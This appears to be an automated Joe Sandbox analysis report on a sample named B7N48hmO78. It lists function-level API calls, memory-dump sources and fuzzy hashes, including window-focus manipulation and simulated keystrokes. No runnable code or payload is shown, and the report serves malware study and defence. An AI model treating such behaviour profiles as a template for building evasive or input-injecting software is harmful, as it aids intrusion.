• String ID:
• API String ID: 2800547568-0
APIs
  • Part of subcall function 010B8B40: GetFileAttributesW.KERNELBASE(?), ref: 010B8B4B
• CreateDirectoryW.KERNELBASE(?,00000000), ref: 010B9435
Memory Dump Source
• Source File: 00000000.00000002.2070917198.00000000010B8000.00000040.00000020.00020000.00000000.sdmp, Offset: 010B8000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10b8000_B7N48hmO78.jbxd
Similarity
• API ID: AttributesCreateDirectoryFile
• String ID:
• API String ID: 3401506121-0
APIs
• __flush.LIBCMT ref: 00E02A0B
  • Part of subcall function 00E07C0E: __getptd_noexit.LIBCMT ref: 00E07C0E
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: __flush__getptd_noexit
• String ID:
• API String ID: 4101623367-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: __getptd_noexit
• String ID:
• API String ID: 3074181302-0
APIs
  • Part of subcall function 00DE4214: FreeLibrary.KERNEL32(00000000,?), ref: 00DE4247
• LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00DE39FE,?,00000001), ref: 00DE41DB
  • Part of subcall function 00DE4291: FreeLibrary.KERNEL32(00000000), ref: 00DE42C4
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: Library$Free$Load
• String ID:
• API String ID: 2391024519-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClearVariant
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1473721057-0
                                                                                                                  • Opcode ID: 8696fa79cbb25bc8b79a58a835849e17cf68301bb97eb40a8e4807694d24c548
                                                                                                                  • Instruction ID: f2270a0d3e1ef7bbc7acd738bdd8acbdf179323c2a962f502e465bae0d90a0d1
                                                                                                                  • Opcode Fuzzy Hash: 8696fa79cbb25bc8b79a58a835849e17cf68301bb97eb40a8e4807694d24c548
                                                                                                                  • Instruction Fuzzy Hash: E3212A70508615CFDB24DF28C844A2ABBF1BF84308F1A8968EA9657722C731E845CF62
                                                                                                                  APIs
                                                                                                                  • ___lock_fhandle.LIBCMT ref: 00E0AFC0
                                                                                                                    • Part of subcall function 00E07BDA: __getptd_noexit.LIBCMT ref: 00E07BDA
                                                                                                                    • Part of subcall function 00E07C0E: __getptd_noexit.LIBCMT ref: 00E07C0E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __getptd_noexit$___lock_fhandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1144279405-0
                                                                                                                  • Opcode ID: e3b98fcbc23ea15b68580afc2f17b583d90d3eb8f6e2335974b79bd0ba4f5a4d
                                                                                                                  • Instruction ID: 5763bc1e2e16bf40eac0492083aea16207922ab7c32c88e38b09009f8899eb39
                                                                                                                  • Opcode Fuzzy Hash: e3b98fcbc23ea15b68580afc2f17b583d90d3eb8f6e2335974b79bd0ba4f5a4d
                                                                                                                  • Instruction Fuzzy Hash: 2111C172905604CFE7127FA4C84239A7BE1AF82335F196650E4B03F1E2D7B49DC08BA1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LibraryLoad
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1029625771-0
                                                                                                                  • Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                                                                  • Instruction ID: 14873043313b3d9360aaf44ddb3a1703adfb90963ef9f4ea34b6ec9da24b1414
                                                                                                                  • Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                                                                  • Instruction Fuzzy Hash: 53013631500149AECF05FFA5C8918FEBB74EF11344F108069B656A7195EA30DA89DF75
                                                                                                                  APIs
                                                                                                                  • __lock_file.LIBCMT ref: 00E02AED
                                                                                                                    • Part of subcall function 00E07C0E: __getptd_noexit.LIBCMT ref: 00E07C0E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __getptd_noexit__lock_file
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2597487223-0
                                                                                                                  • Opcode ID: 803b25b7fb867686fe2457aa8d873c7a13ad655eb8646f9e26af66446ebc5556
                                                                                                                  • Instruction ID: f2f8b9340a1d1b526190bb8f53d79089c5e38daf973cb3b17e4388c472e1a6e8
                                                                                                                  • Opcode Fuzzy Hash: 803b25b7fb867686fe2457aa8d873c7a13ad655eb8646f9e26af66446ebc5556
                                                                                                                  • Instruction Fuzzy Hash: 34F0C231A00205AADF31AFB4CC0A39F36F5BF00324F146419B510BA1D1DB788AE2DB41
                                                                                                                  APIs
                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,00DE39FE,?,00000001), ref: 00DE4286
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeLibrary
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3664257935-0
                                                                                                                  • Opcode ID: 78d9f2488265208255395324859aa50f4566af103b0dc502d0e4a97ba4b5606f
                                                                                                                  • Instruction ID: dbc9b5b218d55be982cabd69934f83370275c9d5729b2d51607d59514d75eb32
                                                                                                                  • Opcode Fuzzy Hash: 78d9f2488265208255395324859aa50f4566af103b0dc502d0e4a97ba4b5606f
                                                                                                                  • Instruction Fuzzy Hash: D5F06571505741CFCB34AF66D894816B7F4BF04325324CA7EF2D682510C7719844DF64
                                                                                                                  APIs
                                                                                                                  • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00DE40C6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LongNamePath
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 82841172-0
                                                                                                                  • Opcode ID: ce012cbaf4d8d1c52175507e80a799fd0fa10256c8925a29f728fcebd3da8a2d
                                                                                                                  • Instruction ID: 59b36629ea6a05ef43c9307a686ef0391abbbe9e3fc4c7f78213e7d6005ebbf9
                                                                                                                  • Opcode Fuzzy Hash: ce012cbaf4d8d1c52175507e80a799fd0fa10256c8925a29f728fcebd3da8a2d
                                                                                                                  • Instruction Fuzzy Hash: 6CE0C236A002245BC721A659DC46FEF77EDDF886E0F4940B5FA09E7244DAB4E9C186A0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __fread_nolock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2638373210-0
                                                                                                                  • Opcode ID: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
                                                                                                                  • Instruction ID: 7c1f4b52ee382cadcdcc27615b1719e2dd6e05bf5c0343e360ab4510a3bdba17
                                                                                                                  • Opcode Fuzzy Hash: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
                                                                                                                  • Instruction Fuzzy Hash: C9E092B0504B409BD7388A24D810BE373E4EB05309F00085CF6AA93242EBA278418659
                                                                                                                  APIs
                                                                                                                  • GetFileAttributesW.KERNELBASE(?), ref: 010B8B4B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2070917198.00000000010B8000.00000040.00000020.00020000.00000000.sdmp, Offset: 010B8000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_10b8000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3188754299-0
                                                                                                                  • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                  • Instruction ID: 5142d23fc3e31a3ae9789b7bc9c8539ba9f4572c08af3a6c36eeef72e9c5e6d6
                                                                                                                  • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                  • Instruction Fuzzy Hash: FDE08CB0A05208EFDB60CABC8894EEDB3ACD704320F008A96E946C32D0E6309A409618
                                                                                                                  APIs
                                                                                                                  • GetFileAttributesW.KERNELBASE(?), ref: 010B8B1B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2070917198.00000000010B8000.00000040.00000020.00020000.00000000.sdmp, Offset: 010B8000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_10b8000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3188754299-0
                                                                                                                  • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                  • Instruction ID: e75fb3d0572eb154fec7e2a18f84e8395fb0cc7950064fd092a8478782ae7edc
                                                                                                                  • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                  • Instruction Fuzzy Hash: EED0A77090520CEBCB10DFB89C44EDE77ACDB04320F008755FD15C3280D53199419754
                                                                                                                  APIs
                                                                                                                  • Sleep.KERNELBASE(000001F4), ref: 010BA541
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2070917198.00000000010B8000.00000040.00000020.00020000.00000000.sdmp, Offset: 010B8000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_10b8000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Sleep
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3472027048-0
                                                                                                                  • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                  • Instruction ID: 8e3033a99092397458eaeb3c51a01d5c91bc3ba1243e2c50836bb70c090cbe90
                                                                                                                  • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                  • Instruction Fuzzy Hash: AFE0BF7494010DEFDB00EFA8D5496DE7BB4EF04301F1005A1FD05D7681DB309E54CA62
                                                                                                                  APIs
                                                                                                                  • Sleep.KERNELBASE(000001F4), ref: 010BA541
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2070917198.00000000010B8000.00000040.00000020.00020000.00000000.sdmp, Offset: 010B8000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_10b8000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Sleep
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3472027048-0
                                                                                                                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                  • Instruction ID: d853ffd56a125b7b638dd72600d2aba5a90981b999d3f7988e5aaf31c8050c21
                                                                                                                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                  • Instruction Fuzzy Hash: B3E0BF7494010DDFDB00EFA8D5496DE7BB4EF04301F100161FD0192281D6309A508A62
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00DFB35F
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 00E4F87D
                                                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E4F8DC
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00E4F919
                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E4F940
                                                                                                                  • SendMessageW.USER32 ref: 00E4F966
                                                                                                                  • _wcsncpy.LIBCMT ref: 00E4F9D2
                                                                                                                  • GetKeyState.USER32(00000011), ref: 00E4F9F3
                                                                                                                  • GetKeyState.USER32(00000009), ref: 00E4FA00
                                                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E4FA16
                                                                                                                  • GetKeyState.USER32(00000010), ref: 00E4FA20
                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E4FA4F
                                                                                                                  • SendMessageW.USER32 ref: 00E4FA72
                                                                                                                  • SendMessageW.USER32(?,00001030,?,00E4E059), ref: 00E4FB6F
                                                                                                                  • SetCapture.USER32(?), ref: 00E4FB9F
                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00E4FC03
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00E4FC29
                                                                                                                  • ReleaseCapture.USER32 ref: 00E4FC34
                                                                                                                  • GetCursorPos.USER32(?), ref: 00E4FC69
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00E4FC76
                                                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E4FCD8
                                                                                                                  • SendMessageW.USER32 ref: 00E4FD02
                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E4FD41
                                                                                                                  • SendMessageW.USER32 ref: 00E4FD6C
                                                                                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00E4FD84
                                                                                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00E4FD8F
                                                                                                                  • GetCursorPos.USER32(?), ref: 00E4FDB0
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00E4FDBD
                                                                                                                  • GetParent.USER32(?), ref: 00E4FDD9
                                                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E4FE3F
                                                                                                                  • SendMessageW.USER32 ref: 00E4FE6F
                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00E4FEC5
                                                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00E4FEF1
                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E4FF19
                                                                                                                  • SendMessageW.USER32 ref: 00E4FF3C
                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00E4FF86
                                                                                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00E4FFB6
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00E5004B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                                                                                                  • String ID: @GUI_DRAGID$F
                                                                                                                  • API String ID: 3461372671-4164748364
                                                                                                                  • Opcode ID: 3f5240432f546aec18407e83af64779bc94ba40fda070d267d1d2f4ac4065687
                                                                                                                  • Instruction ID: 19b34f06d2ae88a3e5cb58e19c2911c12aa64ec65e28a360525aa1d454a26252
                                                                                                                  • Opcode Fuzzy Hash: 3f5240432f546aec18407e83af64779bc94ba40fda070d267d1d2f4ac4065687
                                                                                                                  • Instruction Fuzzy Hash: 9C32CC70A04244EFDB14CF64DC84BAABBE4FF49798F041A29F655AB2A1C771EC08CB51
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00E4B1CD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID: %d/%02d/%02d
                                                                                                                  • API String ID: 3850602802-328681919
                                                                                                                  • Opcode ID: e0636c45c19a68885a10a2825bfebb3b9be994c3f88371d92dce20f070f6c378
                                                                                                                  • Instruction ID: c924e7fddc1f9b0ad134f9365be44336fe93244169f967d0c69b1884d13f23cd
                                                                                                                  • Opcode Fuzzy Hash: e0636c45c19a68885a10a2825bfebb3b9be994c3f88371d92dce20f070f6c378
                                                                                                                  • Instruction Fuzzy Hash: A212C171A00208AFEB249F65EC49FAF7BB8EF45324F144129F916EB2D1DB709945CB21
                                                                                                                  APIs
                                                                                                                  • GetForegroundWindow.USER32(00000000,00000000), ref: 00DFEB4A
                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E53AEA
                                                                                                                  • IsIconic.USER32(000000FF), ref: 00E53AF3
                                                                                                                  • ShowWindow.USER32(000000FF,00000009), ref: 00E53B00
                                                                                                                  • SetForegroundWindow.USER32(000000FF), ref: 00E53B0A
                                                                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E53B20
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00E53B27
                                                                                                                  • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00E53B33
                                                                                                                  • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00E53B44
                                                                                                                  • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00E53B4C
                                                                                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 00E53B54
                                                                                                                  • SetForegroundWindow.USER32(000000FF), ref: 00E53B57
                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E53B6C
                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00E53B77
                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E53B81
                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00E53B86
                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E53B8F
                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00E53B94
                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E53B9E
                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00E53BA3
                                                                                                                  • SetForegroundWindow.USER32(000000FF), ref: 00E53BA6
                                                                                                                  • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00E53BCD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                  • API String ID: 4125248594-2988720461
                                                                                                                  • Opcode ID: b11088f9f326b595e83a278933f8ea1cc14e1b7560e40464106a19408eccb4fa
                                                                                                                  • Instruction ID: 6a6a358e0ab7c83aa1d15473f8f10e1d6776be27d6d12a7f8672cc28b8aae5af
                                                                                                                  • Opcode Fuzzy Hash: b11088f9f326b595e83a278933f8ea1cc14e1b7560e40464106a19408eccb4fa
                                                                                                                  • Instruction Fuzzy Hash: BF31A1B1B44218BFEB212B769C49F7F3E6CEB44B94F104416FA05FA1D0D6F09D04AAA0
                                                                                                                  APIs
